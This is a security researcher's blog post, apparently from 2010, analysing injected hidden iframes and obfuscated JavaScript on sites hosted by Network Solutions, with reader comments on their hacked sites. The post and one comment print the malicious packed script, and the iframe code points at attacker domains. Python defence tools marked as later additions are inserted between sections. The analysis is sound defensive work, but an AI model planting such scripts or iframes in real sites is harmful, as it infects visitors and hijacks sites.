
Network Solutions and WordPress Security Flaw

   11 Apr 10   Filed in Website exploits

I first noticed this hidden iframe from hxxp://networkads .net/ grep/ on April 7. It instantly drew my attention with these weird “iframe_style” scripts in Unmask Parasites reports (I even thought it was a bug in Unmask Parasites, but when I checked the infected site, I found those scripts there).

[Image: weird scripts]

However, it was a single incident and I didn’t see any obvious pattern back then. Two days later, when I noticed David’s (Sucuri Security) article about this very issue and the follow-up by Brian Krebs, I decided to take a closer look at it. What I found is quite interesting and raises a few serious questions about the security of websites on shared servers.

Quick recap of David’s and Brian’s articles

1. Many WordPress blogs have been recently hacked. Someone has injected the following iframe that pushes malicious content from the networkads .net server:

<iframe style="display:none" height="0" width="1" src="hxxp://networkads .net/ grep/"></iframe>

2. The injection was done via the WordPress database. Hackers replaced the value of the “siteurl” option in the “wp_options” table (the table prefix may be different in your case) with the iframe code:

<iframe style=\"display:none\" height=\"0\" width=\" 1\" src=\"hxxp://networkads .net/ grep/\"></iframe>'

3. This dumb modification of the siteurl parameter breaks most blogs (both visually and functionally), since WordPress has many dependencies on the siteurl parameter. So webmasters need to manually revert the value of this parameter to the correct site URL in their MySQL database (it should be something like: http://yousite.com/blogroot ).

4. All affected sites are hosted by Network Solutions.
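A check for the database side of this injection, as an added example that is not from the original article: it reads the `siteurl` and `home` options and flags any value that is not a plain http(s) URL. An in-memory SQLite table stands in for the MySQL `wp_options` table, and the rows and `example.invalid` hosts are constructed sample data.

```python
import sqlite3
from urllib.parse import urlsplit

URL_OPTIONS = ("siteurl", "home")    # WordPress options that must hold a bare URL
FORBIDDEN = set("<>\"'\\ \t\r\n")     # never valid in a site URL, always present in markup


def url_problem(value):
    """Return a reason string if value is not a clean http(s) URL, else None."""
    if any(ch in FORBIDDEN for ch in value):
        return "contains markup or whitespace characters"
    try:
        parts = urlsplit(value)
    except ValueError:
        return "not parseable as a URL"
    if parts.scheme not in ("http", "https"):
        return "scheme is not http or https"
    if not parts.hostname:
        return "no host name"
    if parts.query or parts.fragment:
        return "unexpected query string or fragment"
    return None


def audit_options(conn, table="wp_options"):
    """Return [(option_name, reason)] for URL options that hold a non-URL value."""
    # A table name cannot be a bound parameter, so restrict it to safe characters.
    if not table.replace("_", "").isalnum():
        raise ValueError("unexpected table name")
    marks = ",".join("?" for _ in URL_OPTIONS)
    rows = conn.execute(
        f"SELECT option_name, option_value FROM {table} "
        f"WHERE option_name IN ({marks})", URL_OPTIONS)
    findings = []
    for name, value in rows:
        reason = url_problem(value)
        if reason:
            findings.append((name, reason))
    return findings


def build_sample_db():
    """Constructed stand-in for a blog database with an injected siteurl value."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_options (option_name TEXT, option_value TEXT)")
    conn.executemany("INSERT INTO wp_options VALUES (?, ?)", [
        ("siteurl", '<iframe style="display:none" height="0" width="1" '
                    'src="http://example.invalid/grep/"></iframe>'),
        ("home", "http://blog.example.invalid/blogroot"),
        ("blogname", "Constructed sample blog"),
    ])
    return conn


if __name__ == "__main__":
    for name, reason in audit_options(build_sample_db()):
        print(f"{name}: {reason}")
```

Pass a different `table` argument when the installation uses a table prefix other than `wp_`.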

My findings

Google search

The hack breaks HTML code. This is a typical line of HTML broken by this iframe injection:

<link rel="pingback" href=""><iframe style="display: none" height="0" width="1" src="hxxp://networkads .net/ grep/"></iframe>/xmlrpc.php" />

Since most WordPress themes actively use the siteurl parameter in the <head> section of HTML, this broken code makes them look like this:

[Image: broken blogs]

which makes it possible to compose a Google search query that will return similarly hacked blogs. For example: wp-content text/css media screen xmlrpc.php -pingback – this search produces about 5,000 results. Many of them point to the hacked blogs. These 5,000 of course include multiple indexed pages from the same sites, but I still could easily find more than 60 infected blogs on the first 10 pages of search results. (Warning: many blogs are still infected at the moment of writing.)

Network Solutions only

All those blogs are hosted by Network Solutions. Not a single infected site outside of their network. This means that this specific attack is limited to Network Solutions servers.

Server IPs

Most of the infected blogs (40+) are on the server with IP address: 205.178.145.65

I also found similarly infected blogs on 16 more Network Solutions’ IPs.

Not only a database hack

Not only does this attack inject the iframe code into the WordPress database; on certain sites hackers also inject the (slightly modified) iframe code directly into files on disk.

<iframe frameborder="0" onload=' if (!this.src){ this.src="http://networkads.net/grep/"; this.height=0; this.width=0;} '></iframe>

The places of injection suggest that the code was not taken from the database.
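A scanner for both iframe variants shown above, as an added example that is not part of the original article. It parses HTML with Python's standard `html.parser` and reports iframes that are hidden by style, sized 0 or 1, or given their `src` from an `onload` handler; the sample page and the `example.invalid` hosts are constructed.

```python
import os
import re
from html.parser import HTMLParser

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
TINY_SIZE = re.compile(r"^\s*[01]\s*(px)?\s*$", re.I)                # height/width 0 or 1
HANDLER_SRC = re.compile(r"\bsrc\s*=\s*[\"']([^\"']+)[\"']", re.I)   # this.src="..."
HANDLER_ZERO = re.compile(r"\b(?:height|width)\s*=\s*0\b", re.I)     # this.height=0

# Constructed sample: line 2 is the broken pingback line, line 4 the on-disk variant,
# line 5 an ordinary visible embed that must not be flagged.
SAMPLE = '''<html><head>
<link rel="pingback" href=""><iframe style="display: none" height="0" width="1" src="http://example.invalid/grep/"></iframe>/xmlrpc.php" />
</head><body>
<iframe frameborder="0" onload=' if (!this.src){ this.src="http://example.invalid/grep/"; this.height=0; this.width=0;} '></iframe>
<iframe src="https://video.example.invalid/embed/1" width="560" height="315"></iframe>
</body></html>'''


class HiddenIframeFinder(HTMLParser):
    """Collects iframes that a visitor cannot see."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        reasons = []
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("style hides the frame")
        if any(TINY_SIZE.match(a[d]) for d in ("height", "width") if d in a):
            reasons.append("height or width of 0 or 1")
        src = a.get("src", "")
        handler = a.get("onload", "")
        m = HANDLER_SRC.search(handler)
        if m:
            reasons.append("src assigned in onload handler")
            src = src or m.group(1)
        if HANDLER_ZERO.search(handler):
            reasons.append("onload handler zeroes the frame size")
        if reasons:
            self.findings.append(
                {"line": self.getpos()[0], "src": src, "reasons": reasons})


def scan_html(text):
    """Return a list of findings for one document."""
    finder = HiddenIframeFinder()
    finder.feed(text)
    finder.close()
    return finder.findings


def scan_tree(root, suffixes=(".php", ".html", ".htm", ".tpl")):
    """Yield (path, finding) for every hidden iframe in matching files under root."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(suffixes):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for finding in scan_html(fh.read()):
                        yield path, finding


if __name__ == "__main__":
    for f in scan_html(SAMPLE):
        print(f["line"], f["src"], "; ".join(f["reasons"]))
```

Because the broken pingback line still parses as a `<link>` followed by an `<iframe>`, the same scan works on rendered pages as well as on theme files.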

Other Domains

networkads .net is not the only domain name used by this attack. Before it, hackers used binglbalts .com/ grep/ and now they use mainnetsoll .com/ grep/.

These three domains point to the same server with IP address 64.50.165.169 (Lunar Pages), which seems to be a hacked dedicated (or virtual dedicated) server with several legitimate sites.

According to whois:

  • binglbalts .com – created on Apr 01, 2010
  • networkads .net – created on Apr 04, 2010
  • mainnetsoll .com – created on Apr 10 2010

In spite of such a short history, according to the Google Safe Browsing database, binglbalts .com and networkads .net have already changed several servers on 3 different networks.

Update Apr 13, 2010: It just occurred to me that the mainnetsoll .com domain name almost directly tells us that this attack specifically targets Network Solutions (NetSol) – mainNetSoll .com

Update: obfuscated script

When I published this article I checked the compromised sites once more and discovered this obfuscated script on one of them:

e v a l(function(p, a, c, k, e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('h f(a,8,d){6 3=i m();3.l(3.k()+(d*n));6 5="; 5="+3.j();4.9=a+"="+8+5+"; "}6 c=4.9;b(c.v("g")==-1){4.o(\'<e w="0" y=\\\' b (!2.7){ 2.7="t://u.p/q/"; 2.r=0; 2.s=0;} \\\'></e>\');f("g","1",x)}',35,35,'||this|date|document|expires|var|src|value|cookie|name|if||hours|iframe|addCookie|seref|function|new|toGMTString|getTime|setTime|Date|3600000|write|com|grep|height|width|http|mainnetsoll|indexOf|frameborder|24|onload'.split('|'),0,{})) ;

It was right after the <body> tag.

This script checks whether there is a cookie called “seref”. If there is no such cookie, it injects a hidden iframe from hxxp://mainnetsoll .com/ grep/, and then sets the “seref” cookie for one day.

As you can see the attack constantly evolves, and this time the malicious code is directly injected into some WordPress file.
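A static decoder for this `eval(function(p,a,c,k,e,d)…)` packing, as an added example that is not part of the original article: it rebuilds the hidden script by dictionary substitution without executing anything, then lists the URLs it contains. The packed sample is constructed (it mirrors the cookie check described above but points at `example.invalid`), and only radixes up to 36 are handled.

```python
import re
from urllib.parse import urlsplit

DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"

# Matches the call arguments: }('payload',radix,count,'w0|w1|...'.split('|')
PACKED_CALL = re.compile(
    r"\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,"
    r"\s*'((?:[^'\\]|\\.)*)'\s*\.split\(\s*'\|'\s*\)", re.S)

# Constructed sample in the same packed format (decoder body left out on purpose).
SAMPLE = r"""eval(function(p,a,c,k,e,d){/* decoder body elided */}('4 c=2.5;6(c.7("8")==-1){2.9(\'<3 a="b://d.e/f/"></3>\')}',16,16,'||document|iframe|var|cookie|if|indexOf|seref|write|src|http||example|invalid|grep'.split('|'),0,{}))"""


def to_base(n, radix):
    """Render n in the given radix the way JavaScript's Number.toString(radix) does."""
    if n == 0:
        return "0"
    out = ""
    while n:
        n, r = divmod(n, radix)
        out = DIGITS[r] + out
    return out


def unpack(script):
    """Return the decoded source of a packed script, or None if it is not packed."""
    m = PACKED_CALL.search(script)
    if not m:
        return None
    payload, radix, count, words = m.groups()
    radix, count = int(radix), int(count)
    if not 2 <= radix <= 36:
        raise ValueError("radix above 36 uses a different token alphabet")
    payload = re.sub(r"\\(.)", r"\1", payload, flags=re.S)   # undo JS string escapes
    words = words.split("|")
    table = {}
    for i in range(count):
        token = to_base(i, radix)
        word = words[i] if i < len(words) else ""
        table[token] = word or token      # an empty entry means the token stands for itself
    return re.sub(r"\b\w+\b", lambda t: table.get(t.group(0), t.group(0)), payload)


def analyse(script):
    """Decode a packed script and pull out the URLs and hosts it references."""
    decoded = unpack(script)
    if decoded is None:
        return None
    urls = re.findall(r"https?://[^\s\"'<>\\]+", decoded)
    hosts = sorted({urlsplit(u).hostname for u in urls if urlsplit(u).hostname})
    return {"decoded": decoded, "urls": urls, "hosts": hosts}


if __name__ == "__main__":
    report = analyse(SAMPLE)
    print(report["decoded"])
    print(report["hosts"])
```

The empty dictionary entries matter: they are how the packer keeps literal tokens such as `1` and the variable name `c` unchanged.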

Other hacks

It looks like these latest iframe injections are not the first time WordPress blogs on those Network Solutions servers have been attacked by hackers. I can still see signs of other attacks.

Some of the hacked sites contain hundreds of spammy links that are only visible if you browse with JavaScript disabled. For some reason, every link is enclosed in <noindex> tags and uses rel=”nofollow” in the <a> tag’s parameters. So what’s the use if it is neither for normal web surfers nor for search engines?

The links are followed by the networkads hidden iframes.

alkoltashov.narod.ru

I also found a dozen infected WordPress blogs that try to pull hidden spammy links from hxxp://alkoltashov .narod .ru/ sites.txt. The links are supposed to be displayed in a <div> located way outside of the visible area, but because the configuration of Network Solutions servers disables URL file-access, those link injections fail with the following error (which is also displayed outside of the visible area):

<div style="left: -2322px; position: absolute; top: -3433px">
Warning: readfile() : URL file-access is disabled in the server configuration in /data/path/to/the/user's/account/wordpress/wp-content/themes/themename/header.php on line 163
Warning: readfile(hxxp://alkoltashov .narod .ru/ sites.txt) : failed to open stream: no suitable wrapper could be found in /data/path/to/the/user's/account/wordpress/wp-content/themes/themename/header.php on line 163
</div>

According to Google cache, this unsuccessful remote link injection happened back in January.

And it is also limited to blogs on Network Solutions servers.

WebEasySearch .com

Some of the hacked blogs also redirect search engine results to the webeasysearch .com site. And this only happens if you haven’t visited the hacked blogs before (must be checking WP cookies).

This hack encrypts the search engine’s query string, and then passes it to the webeasysearch .com site, which decrypts it and displays its own search results for the same query.

I bet it is done by some PHP code injected into WordPress files.

The style of the hacks and the range of the affected sites make me think that all those hacks were done by the same hacker.

Update Apr 16, 2010: Found an alias of this site: sbdtds .com. It is used via an injected script. Both sites are hosted on the server with IP 91.205.96.8 (Netherlands, Todayhost Limited)

Update Apr 16, 2010: Cloaked spam

During the investigation of another black-hat SEO case, I noticed a familiar IP address: 205.178.145.65. This is the Net Sol server most affected by this WordPress hack. I knew it was not just a coincidence and decided to find out the scale of this problem.

Using search engines, I found 144 unique hacked sites with spammy pharma links on this server. Moreover, when I checked those sites with Unmask Parasites, more than 100 of them were still infected. Not only WordPress sites are affected. Cloaked spammy content is also found on Joomla sites and even on simple HTML sites.

This server is actively exploited by hackers. If your site happens to be hosted on this server, move ASAP. This is a really bad neighborhood. There are a lot of abandoned sites with vulnerable old versions of popular web applications, so hackers will easily regain access to it even if Net Sol changes every password on this server.

Conclusion

1. The hackers definitely target WordPress blogs, but I doubt any WordPress vulnerability was used. Otherwise we would see similarly hacked blogs not only on the Network Solutions servers.

2. At the same time, more than a dozen Network Solutions servers are affected. There might be a security hole (or at least a flaw) on their network. They should seriously investigate this issue.

3. I agree with David from Sucuri Security who thinks this can be done via access to a single compromised (or even legally created by hackers) account. Hackers can use this account to execute scripts that read content of wp-config.php files on neighbor accounts (according to reverse IP lookup there are several thousand sites on the server with IP 205.178.145.65).

It is quite easy (I won’t give out the tricks to wannabe hackers here, but they work well on Network Solutions servers) to identify sites with WordPress blogs on any server and then identify absolute paths to wp-config.php files that contain database credentials and names of WordPress tables – all in plain text. Then hackers simply need to run another script that injects whatever they want into the databases of their server neighbors.

Similarly, any malicious code can be injected into any writable files under neighbor accounts.

WordPress design flaw

On shared servers, you can protect your own files from malicious neighbors by making them read-only. Usually 644 file permissions and 755 directory permissions do the trick.

However, if neighbors somehow get your database credentials, they can do whatever they want with your database. In case of WordPress, it’s enough to read the wp-config.php file in the root of a WordPress blog.

To hide the content of the wp-config.php file from server neighbors, David (Sucuri Security) suggests that this file should have 750 permissions (I guess he meant 640 since the execution permission is not required). Unfortunately, this trick will only work on servers with suPHP. On other servers, where the web server executes PHP scripts with its own rights, this trick will completely break WordPress blogs. Every page will produce the “Failed opening required ‘wp-config.php’” error.

This means that WordPress blogs on most shared servers are vulnerable to this sort of attack. It merely takes hacking one account (most shared servers have multiple hacked accounts), or even creating a regular account specifically for hacking purposes, to steal the MySQL database credentials of your neighbors with WordPress blogs. Any other database-driven web scripts that store database credentials in plain text are also vulnerable.

The guys from WordPress are aware of this problem on shared servers, but for some reason they also give this strange advice about 750 permissions for wp-config.php, which is both incorrect (750 instead of 640) and will only work on suPHP servers:

Note that if you are on a shared-server the permissions of your wp-config.php should be 750. It means that no other user will be able to read your database username and password. If you have FTP or shell access, do the following:

chmod 750 wp-config.php

So at this point, there is no universal way to protect your database credentials on shared servers. At the same time, I see more and more attacks where a compromised account on a shared server is used to hack other sites on the same server. It’s time to revisit the approach used in the wp-config.php file.
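The 644 / 640 / 750 argument above, worked through as an added example that is not from the original article: a small model of Unix read checks showing, for each mode, whether the blog can still load wp-config.php and whether a neighbor can read it. The accounts and numeric IDs are hypothetical, and the model assumes that without suPHP every customer's PHP scripts run as the web server account.

```python
import os
import stat
from collections import namedtuple

Account = namedtuple("Account", "name uid gids")

# Hypothetical accounts on one shared server (constructed IDs).
OWNER = Account("blog-owner", 1001, (1001,))
NEIGHBOR = Account("neighbor", 1002, (1002,))
WEBSERVER = Account("www-data", 33, (33,))


def can_read(mode, file_uid, file_gid, account):
    """Unix read check: only the first matching class (owner, group, other) is consulted."""
    if account.uid == file_uid:
        return bool(mode & stat.S_IRUSR)
    if file_gid in account.gids:
        return bool(mode & stat.S_IRGRP)
    return bool(mode & stat.S_IROTH)


def assess(mode, php_runs_as_owner, owner=OWNER, neighbor=NEIGHBOR, webserver=WEBSERVER):
    """Evaluate one wp-config.php mode under suPHP (True) or a shared PHP user (False)."""
    file_uid, file_gid = owner.uid, owner.gids[0]
    # Identity that PHP code runs under, for the blog and for the neighbor's scripts.
    blog_php = owner if php_runs_as_owner else webserver
    neighbor_php = neighbor if php_runs_as_owner else webserver
    exposed = (can_read(mode, file_uid, file_gid, neighbor)            # shell or FTP access
               or can_read(mode, file_uid, file_gid, neighbor_php))    # via a PHP script
    return {
        "blog_works": can_read(mode, file_uid, file_gid, blog_php),
        "neighbor_can_read": exposed,
        "needless_exec_bit": bool(mode & 0o111),   # includes never need execute permission
    }


def file_mode(path):
    """Permission bits of a real file, for feeding into assess()."""
    return stat.S_IMODE(os.stat(path).st_mode)


def matrix():
    """All combinations of the three modes discussed and the two execution models."""
    return {(oct(m), su): assess(m, su)
            for m in (0o644, 0o640, 0o750) for su in (True, False)}


if __name__ == "__main__":
    for (mode, su), result in matrix().items():
        print(mode, "suPHP" if su else "shared PHP user", result)
```

In the rows without suPHP, every mode that lets the blog work also lets the neighbor read the file, which is the design flaw this section describes.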

Have your say

What do you think about this issue with world-readable wp-config.php files on shared servers? Any thoughts on how to mitigate it?

If you are a Network Solutions client with a hacked site, I’d also want to hear about your experience. Could you tell us about file permissions you use (especially if you were hit by those alkoltashov .narod .ru and WebEasySearch attacks)?

Any other comments are also welcome.


Reader's Comments (48)

  1. |

    [...] This post was mentioned on Twitter by Denis. Denis said: [blog] Network Solutions and WordPress Security Flaw http://bit.ly/b3qJzG – my take on the mass compromise of WP blogs on NetSol network [...]

  2. |

    Hi .

    I work for Network Solutions and wanted to get in touch and compare notes. You can reach me at my signature below at network solutions.com

    Shashib

    • |

      Shashi,

      I emailed you my list of the still infected sites. Hope it will help.

      I expect that you can share some details about the non-DB injection mutations of this attack.

  3. |

    I’m glad I found this. My client has this issue. The blog doesn’t work now and this is the second time he was hacked on NetSol (the first time he didn’t have a blog). It’s frustrating that such a big company as Network Solutions allows this, given the premium price they charge. I told him it’s time to get out of Dodge.

  4. |

    Thank you for explaining this. I am not a developer just a user of wordpress at Network Solutions. Would you know where I could find the remedy to fix my site at this point? To remove the bugs? Thanks, Nancy

  5. |

    Not only Network Solutions hosted websites have that hack.
    Check the url.

  6. |

    Our first attack was Friday April 2nd in the footer, then April 4th in the header and then an all out assault and take-down on April 8th with dozens of iFrame inserts all over the page.

    We are live this morning, crippled but live.

    It seems from your comment that other hosts like GoDaddy might be subject to the attack if they have lots of WP sites.

    NS are in high denial publicly.

    What is the solution? Private hosting, host your own?

    • |

      I didn’t see any site on GoDaddy affected by this particular attack yet, but potentially more than half of shared servers are vulnerable to this sort of attack.

      For some people dedicated and virtual dedicated servers are the way to go. Unfortunately, it’s more expensive and may require substantial server administering expertise (otherwise you can leave security holes wide open even on private servers)

      On shared servers you have to be very careful about file permissions (especially if suPHP is not used). On the other hand, suPHP servers are more vulnerable to script exploits.

      P.S. You should always have good backup/restore strategy so that you can recover from any hack as soon as possible. And of course, you should be monitoring your site integrity.

  7. |

    Mine is infected. I noticed it Friday 4/9. I have a sub-domain pointing to it I use so I redirected. It already is reported as unsafe to smartscreen filter. Probably several others.

    Network Solutions offered a link to an article so they are aware. Here is the article if you are interested.

    http://blog.networksolutions.com/2010/alert-wordpress-blog-network-solutions/

    Going to read it now and see if I can fix it.

    • |

      Unfortunately, this article doesn’t provide a 100% working solution. All that advice leaves your blog potentially vulnerable to the next rounds of hacks.

  8. |

    I work for Network Solutions and wanted to update you folks on the latest post that may help http://blog.networksolutions.com/2010/update-for-word-press-customers/.

    Thanks,

    Shashi

  9. |

    Network Solutions Ticket#1-460208121

    I’ve had an engineer watching and fixing my site based on the NS instructions and updates provided and the site has crashed and uprighted no less than 7 times in the last 5 days.

    I’m a small business owner and can’t afford another dime in engineering fees to repair this moving target of an issue. Today my site is still down. Network Solutions is killing my business and now I can’t even afford to pay for an engineer to fix the issue.

    I’m held hostage and it sucks to be treated this way.

    -Chris Bell
    —-
    Edit by Denis. Chris, I removed your site link from the signature since the site hasn’t been fixed yet.

  10. |

    [...] Other hacks discovered [...]

  11. |

    Not even going to bother with a ticket. I’m moving from network solutions. My site wasn’t even live (in a development folder) and it was hacked.

  12. |

    Very interesting! I salvaged a client blog this week when Network Solutions was unable to resolve the problem after 3 days.

    My client was very unhappy with Network Solutions already. We decided to move their entire site to a new hosting account.

    Before making nameserver changes, I installed the site in a temporary folder. When the database import showed the same error, I dug into the database and noticed this iframe code in the database site url column of the options table. The site came up fine and all that remained to do was to re-attach images to posts. That’s a whole ‘nuther story. :)

    After everything was in place so my clients could check it out, I went back to the Network Solutions database and removed the malicious iframe code from that table to no avail. Your post possibly explains why this had no effect.

    After the site was checked out in the temp folder and found to be whole, we initiated the nameserver changes and put it up on its own domain. As of this morning, the registration has been transferred to another registrar too.

    I’m not at all impressed with the ability of Network Solutions to handle WordPress after working with their “WordPress Hosting” package, which I couldn’t talk another of my clients out of buying. I couldn’t add plugins or different themes and called to ask why. I was told that “this was the way that it was setup.” With all due respect, one can get that for free at WordPress.com.

    The best part is this: A Network Solutions tech support person told me they wouldn’t use the package. Now, that’s a heck of a testimonial, isn’t it? :)

  13. |

    The real problem is that NetSol is really lame hosting. Everything is easily readable without any hacking skill.

  14. |

    Not sure if I found a great solution or not, but it works!
    You have to change back in the DB > wp-options (table) > siteurl > here, instead of the iframe shit, you put only your URL (http ://…)
    For me this sort of works, I think.
    After doing this, change all the passwords you can, even for the DB, and CHMOD all files so they are secure.
    Hope it works for you..

  15. |

    Add my site to the list of hacked sites. Also Network Solutions is down right now so I can’t even login to transfer to another registrar (9:52 CST 4/15/2101). I’m not sure if Networksolutions being down is related to the site hacking. Regardless this pisses me off. Network solutions just lost my business.

  16. |

    My site, which has only been up for a week, was hacked. I do not host a WordPress blog, but rather, vBulletin 4.0.3 Publishing suite with CMS (articles, blogs, forums). Are we sure that these attacks are only limited to WordPress???? Here are the details of my incident today.

    In several php files, including index.php, the one in root and the one in an administrative folder were completely emptied. 0 bytes. Nada. There were at least 7-10 other php files between root and and my admin folder that were affected. I have not changed anything in the header includes and footer. I had not made any changes that should have caused this. I tried restoring my site and db. Within 45 minutes, the site was down again. The error on my home page was:

    Parse error: syntax error, unexpected ‘<' in /data/21/2/91/95/2091747/user/2293542/htdocs/index.php on line 71

    I opened index.php via filezilla and the following code was appended to the end of a perfectly fine file, just after the end of the last comment in the file. Also, my permissions on the file are 660.

    eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,'g’),k[c])}}return p}(‘h f(a,8,d){6 3=i m();3.l(3.k()+(d*n));6 5=”; 5=”+3.j();4.9=a+”=”+8+5+”; “}6 c=4.9;b(c.v(“g”)==-1){4.o(\’\');f(“g”,”1″,x)}’,35,35,’||this|date|document|e xpires|var|src|value|cookie|name|if||hours|iframe| addCookie|seref|function|new|toGMTString|getTime|s etTime|Date|3600000|write|com|grep|height|width|ht tp|corpadsinc|indexOf|frameborder|24|onload’.split (‘|’),0,{})) ;

    I performed a complete restore of the web and db and everything is fine for now.

    Edit by Denis: I removed your site link from your signature since the site problems are still not fixed.

    • |

      Hi Jacob,

      Thanks for the update. This script injects a hidden iframe from corpadsinc .com/grep/.

      This site has the same IP: 64.50.165 .169 as those networkads .net, binglbalts .com and mainnetsoll .com and the same URL structure /grep/ so it’s definitely the same attack.

      So it must be not WordPress only.

      However, the 660 file permissions may suggest that your site credentials have been stolen by hackers or the server is compromised at the root level.

      Even if it’s a problem with your compromised credentials, why does this attack only affect sites on Network Solutions? I wonder if hackers managed to steal those credentials directly from some Net Sol database?

      Anyway, change your passwords ASAP.

      • |

        I’ve restored my site and am changing my passwords now.

        Directories with 755
        Files with 644

        Is there anyplace in the DB itself I need to check? I do not have a stored proc to find a specific string searching every column of every table. I could get one if necessary. I’m not sure what table would be affected as this is not a wordpress site. It’s a vBulletin 4.0.3 site.

        • |

          In this case it is not a DB hack. The error clearly says that hackers messed with your files on disk.

          “644″ or “660″ as you said in your previous comments?

          Anyway, is suExec or suPHP used on the server?

          • |

            My files were originally 644, then changed to 660 during this hack, and now I’ve changed them back to 644.

            SuExec
            PHP Version 5.2.6
            System Linux vux72 2.6.22.10
            Server API CGI/FastCGI

            MySQL client version: 5.0.75
            Server: Localhost via UNIX socket
            MySQL charset: UTF-8 Unicode (utf8)

  17. |

    Of course it’s not a WordPress problem, any CMS/forum has to store database credential in a plain text file (that’s why vBulletin got hacked too).

    The real problem is Network Solutions’ lame server configurations. Nobody should be able to see someone else’s file on a shared server.
    So do yourself a favour and change hosting provider.

    More details:
    http://wordpress.org/development/2010/04/file-permissions/

    • |

      This time it doesn’t have to do with database credentials. Hackers inject the malicious code directly into files on disk. And it looks like the server configuration (suExec) and file permissions (644) are strict enough to prevent neighbor hacks.

  18. |

    Add NS server 206.188.192.32 to that list.

    All my index.php files were hacked today around 2:43PM and long and nasty scripts inserted. And also in SMF index files.

    Total nightmare. Others are reporting the same.

  19. |

    My Network Solutions site and WordPress blog was hacked sometime on April 8. I found that the siteurl entry for the blog was changed in the wp_options table in the database.

    I was able to edit the entry, but the site did not come back until after I reinstalled WordPress and upgraded.

    I have altered the permission settings as you suggested but I see that will not protect the database proper.

  20. |

    Gee I wish I’d found this a few weeks ago! On April 4th I lost half my database and I really thought I’d messed something up until I found the redirect iframe in the site url (thanks to a search on wordpress hacks). I restored my database from back up and checked it was clean and everything was fine.

    A few days later I found my site was completely locked out from the public. I couldn’t get in to do anything or check it out … nor could I log in to network solutions. Eventually when NS came back up for me (my site was still down) I found my database password changed (no explanation as to why) … I rewrote my config file with the new password and reset all my permissions …they seem to have been rewritten all over the place with php files readable and executable publicly.

    I reset all the permissions including 640 on the config file and everything was fine (mind you it took a few hours to work this out). A week later NS emailed me to let me know they’d changed my password and I should check my file permissions etc. Gee thanks for the speedy info guys!

    Today the same hack happened again and you need to remember my permissions were correct when this happened (although the restore from back up is wrong on permissions, I change it manually each time I restore). Today all my FTP passwords were changed for me with no notification … I’m sure they’ll tell me in a weeks time however.

    Given I had the correct permissions in place to begin with, I’m not sure how it can be a wordpress problem … especially as this specific hack seems to affect network solutions blogs only. I’d also like to point out that my initial wordpress install was done by NS itself and I had to change permission on the config file manually as the NS install set it at 644!!!

    If you want any other info you can write to my email. I’ve cleaned the site again, but who knows how long that will last. Any recommendations for a safer host?

    Stuart

    Edit by Denis: I removed your site link from your signature since it’s still not guaranteed to be safe…

  21. |

    I should have mentioned … I’m on the 205.178.*.* ip also.

  22. |

    2:15pm 4/20/10 script insertion attack on NetSol hosting.

    Immediately after the body tag the script in question sticks out.

    http://www.flickr.com/photos/macewan/4538895496/

    • |

      Thanks Robert,

      I see this script on quite a few other sites on Net Sol hosting.

      • |

        Yesterday morning I discovered that same script inserted into every page on my site named either ‘default.*’ or ‘index.*’ — about 20 instances. I removed them all, only to have them put back repeatedly over the last two days.

        Noob question: It’s a vanilla html site. Everybody talks about making sure that the file permissions are accurate — would that be 755 for directories and 644 for files, or should I be locking it down further than that?

  23. |

    Just removed a malicious script that was just behind the body tag on a very basic html site. Now I also remember that we had some trouble with our ftp passwords and logins. ‘Someone’ had changed them. We tried to contact NS. But they never bothered to answer.

  24. |

    I had to remove the malicious script again! So something is putting it back again every time I remove it? Nice one NS!

  25. |

    The attack continued on Tuesday night with two more sites I know taken down.

    NetSol hasn’t found the source yet.

  26. |

    This is bullsh*t.

    I have two blogs on my site and both got hit in the hacking earlier in the month.

    Now today I’ve been hit three times with the new javascript hack.

    I upload clean copies of the files and they come back in less than an hour or two and replace them with infected versions.

    I’ve logged in and tried changing my FTP password using the Network Solutions site administration panel and the change won’t go through.

    When they changed the passwords on my databases (for the earlier blog hack), they disabled the automatic database back-up and I can’t re-enable it because the control panel keeps giving me a warning about the database user name. Which I tried changing back when the blogs were being hacked (along with the passwords) but that change wouldn’t go through, either.

    They reset the permissions on all the PHP scripts on my site to 640 or the like, so every time one was accessed, the server threw a “mod_mime_magic can’t read file blahblah.php” error. So I was getting error logs running anywhere from one third to half the size of my access logs.

    I filed a service request and they emailed me back saying it had been resolved.

    It hadn’t. Eventually I bitched enough that they left the file permissions at 644 when I reset them. (I’d set them to 644 to stop the errors and they’d reset them to 640.) They’ve also done something to my log directory so that I can’t delete the old logs now.

    And just when I thought things were going to be OK, this javascript hack pops up.

    This is ENTIRELY an internal security matter, I’m convinced of it.

    Can you suggest a better provider? I’m just about ready to move.

    • |

      I guess they are trying to fix things in a hurry and introduce new bugs (one fix may break other things). It may take weeks before they test the changes and the things settle down.

      At this time, moving to some other service provider is a wise step. While shared servers cannot guarantee high level of security, you can try to find at least a more stable service, which won’t reset your settings several times a week.

  27. |

    In the time it took me to type my comment here, they hacked in and inserted the script again.

    This is ridiculous.

  28. |

    We shared-hosting customers are screwed. For now anyway. Isn’t that basically the bottom line?

    I mean we’re supposed to be responsible for application-layer security now?

  29. |

    I have several sites that have been attacked as part of this whole WordPress/Network Solutions debacle. And I do want to move. It’ll have to be shared hosting. I realize you don’t want to recommend one service over another (I guess they all have problems), but can you at least tell us what you think of BlueHost (recommended by WordPress.org) and if you know how they handle security?

  30. |

    Remove or rename the following files in cgi-bin if present:
    counter.cgi
